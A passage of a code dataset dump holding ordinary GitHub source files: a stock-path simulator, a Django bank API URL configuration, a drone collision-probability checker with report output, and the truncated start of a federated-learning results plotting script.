end=timeindex.max())\n timeindex=timeindex[~timeindex.isin(hols)]\n\n # get array of time in yearly units and get stock pathways\n times = np.arange(0,len(timeindex))*freq_in_secs/MARKET_SECONDS_PER_YEAR\n\n # seed and create the pathway generator object\n np.random.seed(seed=seed)\n path_maker = path.GeometricDiffusionManyAsset(self.generator,\n r_param,\n covar_param,\n cholesky_param)\n\n if len(times)>0:\n s_paths = path_maker.get_single_timed_path(initial_values,times)\n else:\n raise RunTimeError('Trying to generate stocks on empty time list')\n\n # put all data into a pandas 
Dataframe\n stocks_df = pd.DataFrame(index=timeindex,data=s_paths,columns=self.stock_names)\n print(\"internal : \",stocks_df.groupby(stocks_df.index.dayofweek).sum())\n np.random.seed(seed=None)\n return stocks_df\n\ndef time_index_to_seconds_elapsed(time_index):\n t_elapsed_s = pd.to_timedelta(time_index - time_index[0]).total_seconds()\n return t_elapsed_s.values\n", "repo_name": "pdghawk/systrade", "sub_path": "systrade/monte/stocks.py", "file_name": "stocks.py", "file_ext": "py", "file_size_in_byte": 3034, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 1, "dataset": "github-code", "pt": "52", "api": [{"api_name": "scipy.linalg.cholesky", "line_number": 33, "usage_type": "call"}, {"api_name": "scipy.linalg", "line_number": 33, "usage_type": "name"}, {"api_name": "pandas.date_range", "line_number": 41, "usage_type": "call"}, {"api_name": "pandas.to_timedelta", "line_number": 43, "usage_type": "call"}, {"api_name": "pandas.tseries.holiday.USFederalHolidayCalendar", "line_number": 49, "usage_type": "call"}, {"api_name": "numpy.arange", "line_number": 54, "usage_type": "call"}, {"api_name": "numpy.random.seed", "line_number": 57, "usage_type": "call"}, {"api_name": "numpy.random", "line_number": 57, "usage_type": "attribute"}, {"api_name": "pandas.DataFrame", "line_number": 69, "usage_type": "call"}, {"api_name": "numpy.random.seed", "line_number": 71, "usage_type": "call"}, {"api_name": "numpy.random", "line_number": 71, "usage_type": "attribute"}, {"api_name": "pandas.to_timedelta", "line_number": 75, "usage_type": "call"}]} +{"seq_id": "74070161124", "text": "\"\"\"BankManager URL Configuration\n\nThe `urlpatterns` list routes URLs to views. For more information please see:\n https://docs.djangoproject.com/en/3.1/topics/http/urls/\nExamples:\nFunction views\n 1. Add an import: from my_app import views\n 2. Add a URL to urlpatterns: path('', views.home, name='home')\nClass-based views\n 1. Add an import: from other_app.views import Home\n 2. Add a URL to urlpatterns: path('', Home.as_view(), name='home')\nIncluding another URLconf\n 1. Import the include() function: from django.urls import include, path\n 2. 
Add a URL to urlpatterns: path('blog/', include('blog.urls'))\n\"\"\"\nfrom django.conf import settings\nfrom django.contrib import admin\nfrom django.urls import path, include\nfrom rest_framework import authentication, permissions\nfrom rest_framework.documentation import include_docs_urls\n\nurlpatterns = [\n path('admin/', admin.site.urls),\n path('user/', include('users.urls')),\n path('transaction/', include('transactions.urls')),\n path('docs/', include_docs_urls(title='Bank API',\n description='User JSON authentication only (scheme value is JWT)',\n authentication_classes=(authentication.BasicAuthentication,),\n permission_classes=(permissions.IsAdminUser,),\n schema_url=f'{settings.HOST_NAME}:{settings.HOST_PORT}',\n )\n ),\n]\n", "repo_name": "maminh/BankManager", "sub_path": "BankManager/urls.py", "file_name": "urls.py", "file_ext": "py", "file_size_in_byte": 1488, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "52", "api": [{"api_name": "django.urls.path", "line_number": 23, "usage_type": "call"}, {"api_name": "django.contrib.admin.site", "line_number": 23, "usage_type": "attribute"}, {"api_name": "django.contrib.admin", "line_number": 23, "usage_type": "name"}, {"api_name": "django.urls.path", "line_number": 24, "usage_type": "call"}, {"api_name": "django.urls.include", "line_number": 24, "usage_type": "call"}, {"api_name": "django.urls.path", "line_number": 25, "usage_type": "call"}, {"api_name": "django.urls.include", "line_number": 25, "usage_type": "call"}, {"api_name": "django.urls.path", "line_number": 26, "usage_type": "call"}, {"api_name": "rest_framework.documentation.include_docs_urls", "line_number": 26, "usage_type": "call"}, {"api_name": "rest_framework.authentication.BasicAuthentication", "line_number": 28, "usage_type": "attribute"}, {"api_name": "rest_framework.authentication", "line_number": 28, "usage_type": "name"}, {"api_name": "rest_framework.permissions.IsAdminUser", "line_number": 29, "usage_type": "attribute"}, {"api_name": "rest_framework.permissions", "line_number": 29, "usage_type": "name"}, {"api_name": "django.conf.settings.HOST_NAME", "line_number": 30, "usage_type": "attribute"}, {"api_name": "django.conf.settings", "line_number": 30, "usage_type": "name"}, {"api_name": "django.conf.settings.HOST_PORT", "line_number": 30, "usage_type": "attribute"}]} +{"seq_id": "9438275256", "text": "from __future__ import annotations\n\nimport copy\nimport itertools\nimport math\nimport os\nfrom itertools import combinations\nfrom typing import List, Dict, Set, Tuple\n\nimport matplotlib.pyplot as plt\nfrom scipy.stats import ncx2\nfrom tabulate import tabulate\n\nfrom xdrone.shared.collision_config import CollisionConfig\nfrom xdrone.shared.command import AbstractDroneCommand, SingleDroneCommand, ParallelDroneCommands, Command\nfrom xdrone.shared.drone_config import DroneConfig\nfrom xdrone.shared.safety_check_error import SafetyCheckError\nfrom xdrone.shared.state import State\nfrom xdrone.state_updaters.state_updater import StateUpdater\n\n\nclass StateVariance:\n def __init__(self, state: State, variance: float = 0.0):\n self._state = state\n self._variance = variance\n\n @property\n def variance(self) -> float:\n return copy.deepcopy(self._variance)\n\n @property\n def state(self) -> State:\n return copy.deepcopy(self._state)\n\n\nclass CollisionChecker:\n def __init__(self, drone_config_map: Dict[str, DroneConfig], collision_config: CollisionConfig):\n self.drone_config_map = drone_config_map\n 
self.collision_config = collision_config\n\n def check(self, drone_commands: List[AbstractDroneCommand],\n state_updater_map: Dict[str, StateUpdater],\n save_report: bool = False):\n if len(self.drone_config_map) == 1:\n # no need to check if there is only 1 drone\n return\n drone_trajectory_map = {name: [StateVariance(state_updater.get_init_state())] for name, state_updater in\n state_updater_map.items()}\n drones_involved = set(state_updater_map.keys())\n try:\n self._update_states_for_abstract_drone_command(drone_commands, state_updater_map, drone_trajectory_map,\n drones_involved)\n except Exception as e:\n raise SafetyCheckError(\"Error occurred during collision check, \"\n \"please retry with a better collision_config. Error: \" + str(e))\n\n collisions, time_slice_info = self._get_possible_collisions_and_time_slice_info(drone_trajectory_map)\n if save_report:\n CollisionReportSaver.save_check_report(time_slice_info)\n self._check_collisions(collisions)\n\n def _get_possible_collisions_and_time_slice_info(self, drone_trajectory_map: Dict[str, List[StateVariance]]) \\\n -> (List[Tuple], List[Tuple]):\n time = 0\n time_slice_info = []\n collisions = []\n drone_trajectories = dict(drone_trajectory_map)\n while any(drone_trajectories.values()):\n time += self.collision_config.time_interval_seconds\n state_group = []\n for name, drone_trajectory in drone_trajectories.items():\n possible_states = []\n while drone_trajectory and drone_trajectory[0].state.time_used_seconds < time:\n state_variance = drone_trajectory.pop(0)\n possible_states.append((name, state_variance))\n if possible_states:\n state_group.append(possible_states)\n # Commented out: check all possible states combinations if one drone has multiple states in time interval\n # possible_combinations = list(itertools.product(*state_group))\n # Only check combinations of last states if one drone has multiple states in time interval\n state_group = [possible_states[-1] for possible_states in state_group]\n possible_combinations = list(itertools.combinations(state_group, r=2))\n for possible_combination in possible_combinations:\n for (name1, state_variance1), (name2, state_variance2) in combinations(possible_combination, r=2):\n state1, variance1 = state_variance1.state, state_variance1.variance\n state2, variance2 = state_variance2.state, state_variance2.variance\n variance = variance1 + variance2\n\n x = state1.x_meters - state2.x_meters\n y = state1.y_meters - state2.y_meters\n z = state1.z_meters - state2.z_meters\n mean_distance = math.sqrt(x ** 2 + y ** 2 + z ** 2)\n collision_meters = self.collision_config.collision_meters\n\n if math.isclose(variance, 0):\n # when variance is 0, perform as determined, confidence is either 1 or 0\n if collision_meters == 0:\n confidence = 0.0\n elif mean_distance > collision_meters + 1e-5:\n confidence = 0.0\n else:\n confidence = 1.0\n else:\n # use non central chi-squared distribution to calculated confidence\n nc = x ** 2 / variance + y ** 2 / variance + z ** 2 / variance\n confidence = ncx2.cdf(collision_meters ** 2 / variance, df=3, nc=nc)\n\n if confidence >= self.collision_config.confidence_threshold - 1e-8:\n collisions.append((name1, name2, state1, state2, mean_distance, confidence))\n\n time_slice_info.append((name1, name2, time, mean_distance, confidence))\n return collisions, time_slice_info\n\n def _check_collisions(self, collisions: List[Tuple[str, str, State, State, float, float]]):\n if collisions:\n error_msg = \"Collisions might happen!\\n\"\n for name1, name2, state1, 
state2, mean_distance, confidence in collisions:\n time = round((state1.time_used_seconds + state2.time_used_seconds) / 2, 2)\n x = round((state1.x_meters + state2.x_meters) / 2, 2)\n y = round((state1.y_meters + state2.y_meters) / 2, 2)\n z = round((state1.z_meters + state2.z_meters) / 2, 2)\n mean_distance = round(mean_distance, 5)\n error_msg += (\"Collision might happen between {} and {}, at time {}s, \".format(name1, name2, time) +\n \"near position (x={}m, y={}m, z={}m), distance={}m, confidence={:.3f}%\\n\"\n .format(x, y, z, mean_distance, confidence * 100))\n raise SafetyCheckError(error_msg)\n\n def _update_states_for_abstract_drone_command(self, drone_commands: List[AbstractDroneCommand],\n state_updaters: Dict[str, StateUpdater],\n drone_trajectory_map: Dict[str, List[StateVariance]],\n drones_involved: Set[str]) -> float:\n total_time_used = 0\n for drone_command in drone_commands:\n if isinstance(drone_command, SingleDroneCommand):\n total_time_used += self._update_states_for_single_drone_command(drone_command,\n state_updaters,\n drone_trajectory_map,\n drones_involved)\n elif isinstance(drone_command, ParallelDroneCommands):\n total_time_used += self._update_states_for_parallel_drone_commands(drone_command,\n state_updaters,\n drone_trajectory_map,\n drones_involved)\n return total_time_used\n\n def _update_states_for_single_drone_command(self, single_drone_command: SingleDroneCommand,\n state_updaters: Dict[str, StateUpdater],\n drone_trajectory_map: Dict[str, List[StateVariance]],\n drones_involved: Set[str]) -> float:\n time_used = self._update_states(single_drone_command, state_updaters, drone_trajectory_map, drones_involved)\n return time_used\n\n def _get_last_state_and_variance(self, drone_trajectory_map: Dict[str, List[StateVariance]],\n drone_name: str) -> (State, float):\n old_state_variance = drone_trajectory_map[drone_name][-1]\n old_state = old_state_variance.state\n old_variance = old_state_variance.variance\n return old_state, old_variance\n\n def _update_states(self, single_drone_command: SingleDroneCommand,\n state_updaters: Dict[str, StateUpdater],\n drone_trajectory_map: Dict[str, List[StateVariance]],\n drones_involved: Set[str]) -> float:\n time_interval = self.collision_config.time_interval_seconds\n drone_name = single_drone_command.drone_name\n command = single_drone_command.command\n if command.opcode == \"takeoff\":\n takeoff_distance = self.drone_config_map[drone_name].takeoff_height_meters\n new_drone_command = SingleDroneCommand(drone_name, Command.up(takeoff_distance))\n return self._update_states(new_drone_command, state_updaters, drone_trajectory_map, drones_involved)\n if command.opcode == \"land\":\n old_state, old_variance = self._get_last_state_and_variance(drone_trajectory_map, drone_name)\n land_distance = old_state.z_meters\n new_drone_command = SingleDroneCommand(drone_name, Command.down(land_distance))\n return self._update_states(new_drone_command, state_updaters, drone_trajectory_map, drones_involved)\n if command.opcode == \"wait\":\n seconds, = command.operands\n old_state, old_variance = self._get_last_state_and_variance(drone_trajectory_map, drone_name)\n if seconds <= time_interval:\n new_state = state_updaters[drone_name].update(Command.wait(seconds), old_state)\n new_state_variance = StateVariance(new_state, old_variance)\n drone_trajectory_map[drone_name].append(new_state_variance)\n for name in drones_involved.difference({drone_name}):\n state, variance = self._get_last_state_and_variance(drone_trajectory_map, name)\n 
state = state.copy_and_set_time_used_seconds(state.time_used_seconds + seconds)\n drone_trajectory_map[name].append(StateVariance(state, variance))\n return seconds\n else:\n new_state = state_updaters[drone_name].update(Command.wait(time_interval), old_state)\n new_state_variance = StateVariance(new_state, old_variance)\n drone_trajectory_map[drone_name].append(new_state_variance)\n for name in drones_involved.difference({drone_name}):\n state, variance = self._get_last_state_and_variance(drone_trajectory_map, name)\n state = state.copy_and_set_time_used_seconds(state.time_used_seconds + time_interval)\n drone_trajectory_map[name].append(StateVariance(state, variance))\n new_drone_command = SingleDroneCommand(drone_name, Command.wait(seconds - time_interval))\n return time_interval + self._update_states(new_drone_command, state_updaters, drone_trajectory_map,\n drones_involved)\n if command.opcode in [\"rotate_left\", \"rotate_right\"]:\n degrees, = command.operands\n old_state, old_variance = self._get_last_state_and_variance(drone_trajectory_map, drone_name)\n rotate_speed = self.drone_config_map[drone_name].rotate_speed_dps\n seconds = degrees / rotate_speed\n if seconds <= time_interval:\n new_state = state_updaters[drone_name].update(Command(command.opcode, [rotate_speed * seconds]),\n old_state)\n new_variance = old_variance + self.drone_config_map[drone_name].var_per_degree * seconds * rotate_speed\n new_state_variance = StateVariance(new_state, new_variance)\n drone_trajectory_map[drone_name].append(new_state_variance)\n for name in drones_involved.difference({drone_name}):\n state, variance = self._get_last_state_and_variance(drone_trajectory_map, name)\n state = state.copy_and_set_time_used_seconds(state.time_used_seconds + seconds)\n drone_trajectory_map[name].append(StateVariance(state, variance))\n return seconds\n else:\n new_state = state_updaters[drone_name].update(Command(command.opcode, [rotate_speed * time_interval]),\n old_state)\n new_variance = old_variance + \\\n self.drone_config_map[drone_name].var_per_degree * time_interval * rotate_speed\n new_state_variance = StateVariance(new_state, new_variance)\n drone_trajectory_map[drone_name].append(new_state_variance)\n for name in drones_involved.difference({drone_name}):\n state, variance = self._get_last_state_and_variance(drone_trajectory_map, name)\n state = state.copy_and_set_time_used_seconds(state.time_used_seconds + time_interval)\n drone_trajectory_map[name].append(StateVariance(state, variance))\n new_drone_command = SingleDroneCommand(drone_name,\n Command(command.opcode,\n [degrees - rotate_speed * time_interval]))\n return time_interval + self._update_states(new_drone_command, state_updaters, drone_trajectory_map,\n drones_involved)\n if command.opcode in [\"up\", \"down\", \"left\", \"right\", \"forward\", \"backward\"]:\n meters, = command.operands\n old_state_variance = drone_trajectory_map[drone_name][-1]\n old_state = old_state_variance.state\n old_variance = old_state_variance.variance\n speed = self.drone_config_map[drone_name].speed_mps\n seconds = meters / speed\n if seconds <= time_interval:\n new_state = state_updaters[drone_name].update(Command(command.opcode, [speed * seconds]),\n old_state)\n new_variance = old_variance + self.drone_config_map[drone_name].var_per_meter * seconds * speed\n new_state_variance = StateVariance(new_state, new_variance)\n drone_trajectory_map[drone_name].append(new_state_variance)\n for name in drones_involved.difference({drone_name}):\n state_variance = 
drone_trajectory_map[name][-1]\n state = state_variance.state\n variance = state_variance.variance\n state = state.copy_and_set_time_used_seconds(state.time_used_seconds + seconds)\n drone_trajectory_map[name].append(StateVariance(state, variance))\n return seconds\n else:\n new_state = state_updaters[drone_name].update(Command(command.opcode, [speed * time_interval]),\n old_state)\n new_variance = old_variance + self.drone_config_map[drone_name].var_per_meter * time_interval * speed\n new_state_variance = StateVariance(new_state, new_variance)\n drone_trajectory_map[drone_name].append(new_state_variance)\n for name in drones_involved.difference({drone_name}):\n state_variance = drone_trajectory_map[name][-1]\n state = state_variance.state\n variance = state_variance.variance\n state = state.copy_and_set_time_used_seconds(state.time_used_seconds + time_interval)\n drone_trajectory_map[name].append(StateVariance(state, variance))\n new_drone_command = SingleDroneCommand(drone_name,\n Command(command.opcode, [meters - speed * time_interval]))\n return time_interval + self._update_states(new_drone_command, state_updaters, drone_trajectory_map,\n drones_involved)\n\n def _update_states_for_parallel_drone_commands(self, parallel_drone_commands: ParallelDroneCommands,\n state_updaters: Dict[str, StateUpdater],\n drone_trajectory_map: Dict[str, List[StateVariance]],\n drones_involved: Set[str]) -> float:\n assert len(parallel_drone_commands.branches) > 0\n time_used_in_branches = self._update_states_and_check_for_each_branch(parallel_drone_commands,\n state_updaters,\n drone_trajectory_map)\n longest_time_used = self._update_states_to_wait_for_slowest_branch(parallel_drone_commands,\n state_updaters,\n drone_trajectory_map,\n time_used_in_branches,\n drones_involved)\n return longest_time_used\n\n def _update_states_and_check_for_each_branch(self, parallel_drone_commands: ParallelDroneCommands,\n state_updaters: Dict[str, StateUpdater],\n drone_trajectory_map: Dict[str, List[StateVariance]]) -> List[float]:\n time_used_in_branches = []\n for i, branch in enumerate(parallel_drone_commands.branches):\n drones_involved = parallel_drone_commands.drones_involved_each_branch[i]\n time_used = self._update_states_for_abstract_drone_command(branch, state_updaters,\n drone_trajectory_map, drones_involved)\n time_used_in_branches.append(time_used)\n return time_used_in_branches\n\n def _update_states_to_wait_for_slowest_branch(self, parallel_drone_commands: ParallelDroneCommands,\n state_updaters: Dict[str, StateUpdater],\n drone_trajectory_map: Dict[str, List[StateVariance]],\n time_used_in_branches: List[float],\n drones_involved: Set[str]) -> float:\n longest_time_used = max(time_used_in_branches)\n # for each branch, let drones involved in the branch wait until longest_time_used\n for i, time_used in enumerate(time_used_in_branches):\n for name in parallel_drone_commands.drones_involved_each_branch[i]:\n wait_command = Command.wait(longest_time_used - time_used)\n self._update_states_for_single_drone_command(SingleDroneCommand(name, wait_command),\n state_updaters,\n drone_trajectory_map,\n drones_involved={name})\n # let drones not involved in any branch wait for longest_time_used\n for name in drones_involved.difference(parallel_drone_commands.get_drones_involved()):\n wait_command = Command.wait(longest_time_used)\n self._update_states_for_single_drone_command(SingleDroneCommand(name, wait_command),\n state_updaters,\n drone_trajectory_map,\n drones_involved={name})\n return 
longest_time_used\n\n\nclass CollisionReportSaver:\n @staticmethod\n def save_check_report(time_slice_info: List[Tuple[str, str, float, float, float]]):\n report_dir = \"reports\"\n if not os.path.isdir(report_dir):\n os.mkdir(report_dir)\n\n file_name = os.path.join(report_dir, \"collision check log (all drones).txt\")\n\n with open(file_name, \"w\") as file:\n sorted_time_slice_info = sorted(time_slice_info, key=lambda elem: elem[2])\n file.write(tabulate(CollisionReportSaver._format_rows(sorted_time_slice_info),\n headers=[\"Drone 1\", \"Drone 2\", \"Time\", \"Distance\", \"Confidence\"],\n colalign=(\"default\", \"default\", \"default\", \"default\", \"right\")))\n\n drone_pairs = sorted(set([(name1, name2) for (name1, name2, _, _, _) in time_slice_info]))\n\n for drone_pair in drone_pairs:\n filtered_time_slice_info = filter(lambda elem: drone_pair == (elem[0], elem[1]), time_slice_info)\n filtered_time_slice_info = sorted(filtered_time_slice_info, key=lambda elem: elem[2])\n\n file_name = os.path.join(report_dir, \"collision check log ({}-{}).txt\".format(drone_pair[0], drone_pair[1]))\n with open(file_name, \"w\") as file:\n file.write(tabulate(CollisionReportSaver._format_rows(filtered_time_slice_info),\n headers=[\"Drone 1\", \"Drone 2\", \"Time\", \"Distance\", \"Confidence\"],\n colalign=(\"default\", \"default\", \"default\", \"default\", \"right\")))\n\n times = [time for (_, _, time, _, _) in filtered_time_slice_info]\n probabilities = [prob for (_, _, _, _, prob) in filtered_time_slice_info]\n fig, ax = plt.subplots()\n ax.plot(times, probabilities)\n ax.set_xlabel(\"Time\")\n ax.set_ylabel(\"Probability\")\n ax.set_title(\"Probability of Collision between {} and {}\".format(drone_pair[0], drone_pair[1]))\n ax.set_ylim([-0.05, 1.05])\n fig_name = os.path.join(report_dir, \"collision probability ({}-{}).png\".format(drone_pair[0], drone_pair[1]))\n fig.savefig(fig_name)\n\n @staticmethod\n def _format_rows(table: List[Tuple[str, str, float, float, float]]) -> List[Tuple[str, str, float, float, str]]:\n return [(name1, name2, round(time, 3), round(distance, 5), \"{:3.3f}%\".format(confidence * 100))\n for (name1, name2, time, distance, confidence) in table]\n", "repo_name": "xDrone-DSL/xDroneLanguageServer", "sub_path": "xdrone/safety_checker/collision_checker.py", "file_name": "collision_checker.py", "file_ext": "py", "file_size_in_byte": 23166, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "52", "api": [{"api_name": "xdrone.shared.state.State", "line_number": 23, "usage_type": "name"}, {"api_name": "copy.deepcopy", "line_number": 29, "usage_type": "call"}, {"api_name": "copy.deepcopy", "line_number": 33, "usage_type": "call"}, {"api_name": "xdrone.shared.state.State", "line_number": 32, "usage_type": "name"}, {"api_name": "typing.Dict", "line_number": 37, "usage_type": "name"}, {"api_name": "xdrone.shared.drone_config.DroneConfig", "line_number": 37, "usage_type": "name"}, {"api_name": "xdrone.shared.collision_config.CollisionConfig", "line_number": 37, "usage_type": "name"}, {"api_name": "typing.List", "line_number": 41, "usage_type": "name"}, {"api_name": "xdrone.shared.command.AbstractDroneCommand", "line_number": 41, "usage_type": "name"}, {"api_name": "typing.Dict", "line_number": 42, "usage_type": "name"}, {"api_name": "xdrone.state_updaters.state_updater.StateUpdater", "line_number": 42, "usage_type": "name"}, {"api_name": "xdrone.shared.safety_check_error.SafetyCheckError", "line_number": 54, "usage_type": 
"call"}, {"api_name": "typing.Dict", "line_number": 62, "usage_type": "name"}, {"api_name": "typing.List", "line_number": 62, "usage_type": "name"}, {"api_name": "itertools.combinations", "line_number": 82, "usage_type": "call"}, {"api_name": "itertools.combinations", "line_number": 84, "usage_type": "call"}, {"api_name": "math.sqrt", "line_number": 92, "usage_type": "call"}, {"api_name": "math.isclose", "line_number": 95, "usage_type": "call"}, {"api_name": "scipy.stats.ncx2.cdf", "line_number": 106, "usage_type": "call"}, {"api_name": "scipy.stats.ncx2", "line_number": 106, "usage_type": "name"}, {"api_name": "typing.List", "line_number": 63, "usage_type": "name"}, {"api_name": "typing.Tuple", "line_number": 63, "usage_type": "name"}, {"api_name": "typing.List", "line_number": 114, "usage_type": "name"}, {"api_name": "typing.Tuple", "line_number": 114, "usage_type": "name"}, {"api_name": "xdrone.shared.state.State", "line_number": 114, "usage_type": "name"}, {"api_name": "xdrone.shared.safety_check_error.SafetyCheckError", "line_number": 126, "usage_type": "call"}, {"api_name": "typing.List", "line_number": 128, "usage_type": "name"}, {"api_name": "xdrone.shared.command.AbstractDroneCommand", "line_number": 128, "usage_type": "name"}, {"api_name": "typing.Dict", "line_number": 129, "usage_type": "name"}, {"api_name": "xdrone.state_updaters.state_updater.StateUpdater", "line_number": 129, "usage_type": "name"}, {"api_name": "typing.Dict", "line_number": 130, "usage_type": "name"}, {"api_name": "typing.List", "line_number": 130, "usage_type": "name"}, {"api_name": "typing.Set", "line_number": 131, "usage_type": "name"}, {"api_name": "xdrone.shared.command.SingleDroneCommand", "line_number": 134, "usage_type": "argument"}, {"api_name": "xdrone.shared.command.ParallelDroneCommands", "line_number": 139, "usage_type": "argument"}, {"api_name": "xdrone.shared.command.SingleDroneCommand", "line_number": 146, "usage_type": "name"}, {"api_name": "typing.Dict", "line_number": 147, "usage_type": "name"}, {"api_name": "xdrone.state_updaters.state_updater.StateUpdater", "line_number": 147, "usage_type": "name"}, {"api_name": "typing.Dict", "line_number": 148, "usage_type": "name"}, {"api_name": "typing.List", "line_number": 148, "usage_type": "name"}, {"api_name": "typing.Set", "line_number": 149, "usage_type": "name"}, {"api_name": "typing.Dict", "line_number": 153, "usage_type": "name"}, {"api_name": "typing.List", "line_number": 153, "usage_type": "name"}, {"api_name": "xdrone.shared.state.State", "line_number": 154, "usage_type": "name"}, {"api_name": "xdrone.shared.command.SingleDroneCommand", "line_number": 160, "usage_type": "name"}, {"api_name": "typing.Dict", "line_number": 161, "usage_type": "name"}, {"api_name": "xdrone.state_updaters.state_updater.StateUpdater", "line_number": 161, "usage_type": "name"}, {"api_name": "typing.Dict", "line_number": 162, "usage_type": "name"}, {"api_name": "typing.List", "line_number": 162, "usage_type": "name"}, {"api_name": "typing.Set", "line_number": 163, "usage_type": "name"}, {"api_name": "xdrone.shared.command.SingleDroneCommand", "line_number": 169, "usage_type": "call"}, {"api_name": "xdrone.shared.command.Command.up", "line_number": 169, "usage_type": "call"}, {"api_name": "xdrone.shared.command.Command", "line_number": 169, "usage_type": "name"}, {"api_name": "xdrone.shared.command.SingleDroneCommand", "line_number": 174, "usage_type": "call"}, {"api_name": "xdrone.shared.command.Command.down", "line_number": 174, "usage_type": "call"}, 
{"api_name": "xdrone.shared.command.Command", "line_number": 174, "usage_type": "name"}, {"api_name": "xdrone.shared.command.Command.wait", "line_number": 180, "usage_type": "call"}, {"api_name": "xdrone.shared.command.Command", "line_number": 180, "usage_type": "name"}, {"api_name": "xdrone.shared.command.Command.wait", "line_number": 189, "usage_type": "call"}, {"api_name": "xdrone.shared.command.Command", "line_number": 189, "usage_type": "name"}, {"api_name": "xdrone.shared.command.SingleDroneCommand", "line_number": 196, "usage_type": "call"}, {"api_name": "xdrone.shared.command.Command.wait", "line_number": 196, "usage_type": "call"}, {"api_name": "xdrone.shared.command.Command", "line_number": 196, "usage_type": "name"}, {"api_name": "xdrone.shared.command.Command", "line_number": 205, "usage_type": "call"}, {"api_name": "xdrone.shared.command.Command", "line_number": 216, "usage_type": "call"}, {"api_name": "xdrone.shared.command.SingleDroneCommand", "line_number": 226, "usage_type": "call"}, {"api_name": "xdrone.shared.command.Command", "line_number": 227, "usage_type": "call"}, {"api_name": "xdrone.shared.command.Command", "line_number": 239, "usage_type": "call"}, {"api_name": "xdrone.shared.command.Command", "line_number": 252, "usage_type": "call"}, {"api_name": "xdrone.shared.command.SingleDroneCommand", "line_number": 263, "usage_type": "call"}, {"api_name": "xdrone.shared.command.Command", "line_number": 264, "usage_type": "call"}, {"api_name": "xdrone.shared.command.ParallelDroneCommands", "line_number": 268, "usage_type": "name"}, {"api_name": "typing.Dict", "line_number": 269, "usage_type": "name"}, {"api_name": "xdrone.state_updaters.state_updater.StateUpdater", "line_number": 269, "usage_type": "name"}, {"api_name": "typing.Dict", "line_number": 270, "usage_type": "name"}, {"api_name": "typing.List", "line_number": 270, "usage_type": "name"}, {"api_name": "typing.Set", "line_number": 271, "usage_type": "name"}, {"api_name": "xdrone.shared.command.ParallelDroneCommands", "line_number": 283, "usage_type": "name"}, {"api_name": "typing.Dict", "line_number": 284, "usage_type": "name"}, {"api_name": "xdrone.state_updaters.state_updater.StateUpdater", "line_number": 284, "usage_type": "name"}, {"api_name": "typing.Dict", "line_number": 285, "usage_type": "name"}, {"api_name": "typing.List", "line_number": 285, "usage_type": "name"}, {"api_name": "xdrone.shared.command.ParallelDroneCommands", "line_number": 294, "usage_type": "name"}, {"api_name": "typing.Dict", "line_number": 295, "usage_type": "name"}, {"api_name": "xdrone.state_updaters.state_updater.StateUpdater", "line_number": 295, "usage_type": "name"}, {"api_name": "typing.Dict", "line_number": 296, "usage_type": "name"}, {"api_name": "typing.List", "line_number": 296, "usage_type": "name"}, {"api_name": "typing.List", "line_number": 297, "usage_type": "name"}, {"api_name": "typing.Set", "line_number": 298, "usage_type": "name"}, {"api_name": "xdrone.shared.command.Command.wait", "line_number": 303, "usage_type": "call"}, {"api_name": "xdrone.shared.command.Command", "line_number": 303, "usage_type": "name"}, {"api_name": "xdrone.shared.command.SingleDroneCommand", "line_number": 304, "usage_type": "call"}, {"api_name": "xdrone.shared.command.Command.wait", "line_number": 310, "usage_type": "call"}, {"api_name": "xdrone.shared.command.Command", "line_number": 310, "usage_type": "name"}, {"api_name": "xdrone.shared.command.SingleDroneCommand", "line_number": 311, "usage_type": "call"}, {"api_name": "typing.List", 
"line_number": 320, "usage_type": "name"}, {"api_name": "typing.Tuple", "line_number": 320, "usage_type": "name"}, {"api_name": "os.path.isdir", "line_number": 322, "usage_type": "call"}, {"api_name": "os.path", "line_number": 322, "usage_type": "attribute"}, {"api_name": "os.mkdir", "line_number": 323, "usage_type": "call"}, {"api_name": "os.path.join", "line_number": 325, "usage_type": "call"}, {"api_name": "os.path", "line_number": 325, "usage_type": "attribute"}, {"api_name": "tabulate.tabulate", "line_number": 329, "usage_type": "call"}, {"api_name": "os.path.join", "line_number": 339, "usage_type": "call"}, {"api_name": "os.path", "line_number": 339, "usage_type": "attribute"}, {"api_name": "tabulate.tabulate", "line_number": 341, "usage_type": "call"}, {"api_name": "matplotlib.pyplot.subplots", "line_number": 347, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 347, "usage_type": "name"}, {"api_name": "os.path.join", "line_number": 353, "usage_type": "call"}, {"api_name": "os.path", "line_number": 353, "usage_type": "attribute"}, {"api_name": "typing.List", "line_number": 357, "usage_type": "name"}, {"api_name": "typing.Tuple", "line_number": 357, "usage_type": "name"}]} +{"seq_id": "74715991523", "text": "import numpy as np\nimport matplotlib\nimport matplotlib.pyplot as plt\nimport argparse\n\nparser = argparse.ArgumentParser()\nparser.add_argument(\"--dataset\", type=str)\nparser.add_argument(\"--n_worker\", type=int)\nparser.add_argument(\"--K\", type=int)\nparser.add_argument(\"--n_round\", type=int)\n\nargs = parser.parse_args()\n\n#scheme_list = [ 'FEDAVG', 'FEDSVRG', 'RESSGD', 'RESAVG', 'RESSVRG', 'RESSIMUL']\nscheme_list = ['RESSGD', 'RESAVG', 'RESSVRG', 'RESSIMUL', 'FEDAVG', 'FEDSVRG', 'FEDPROX', 'LOCAL']\n#scheme_list = ['RESAVG', 'RESSVRG']\nscheme_names = ['FedResSGD', 'FedResAVG (Opt I)', 'FedResAVG (Opt II)', 'FedResNaive', 'FedAVG', 'SCAFFOLD', 'FedProx', 'Local']\n#scheme_names = [ 'FedResAVG (Opt I)', 'FedResAVG (Opt II)']\n#scheme_list = [ 'RESSGD', 'RESAVG']\n#markers_on = [0,10, 20, 30, 40, 50]\nmarkers_color = ['tab:red','tab:orange','tab:green', 'tab:blue', 'magenta', 'tab:brown', 'crimson', 'gold']\nmarkers_shape = ['s', 'v','o', 'x', '>', '^', '<', 'D']\n\n\nN=args.n_worker\nK=args.K\ndataset = args.dataset\nn_round = args.n_round\n\n\nM = np.zeros((len(scheme_list), n_round))\nV = np.zeros((len(scheme_list), n_round))\n\nfor i in range(len(scheme_list)):\n nameM = \"outtf/\" + dataset + \"/\" + scheme_list[i] + \"_N\" + str(N) + \"_R\" + str(n_round) + \"_K\" + str(K) + \"_summaryM\"\n nameV = \"outtf/\" + dataset + \"/\" + scheme_list[i] + \"_N\" + str(N) + \"_R\" + str(n_round) + \"_K\" + str(K) + \"_summaryV\"\n tmpM = np.load(open(nameM, 'rb'))\n 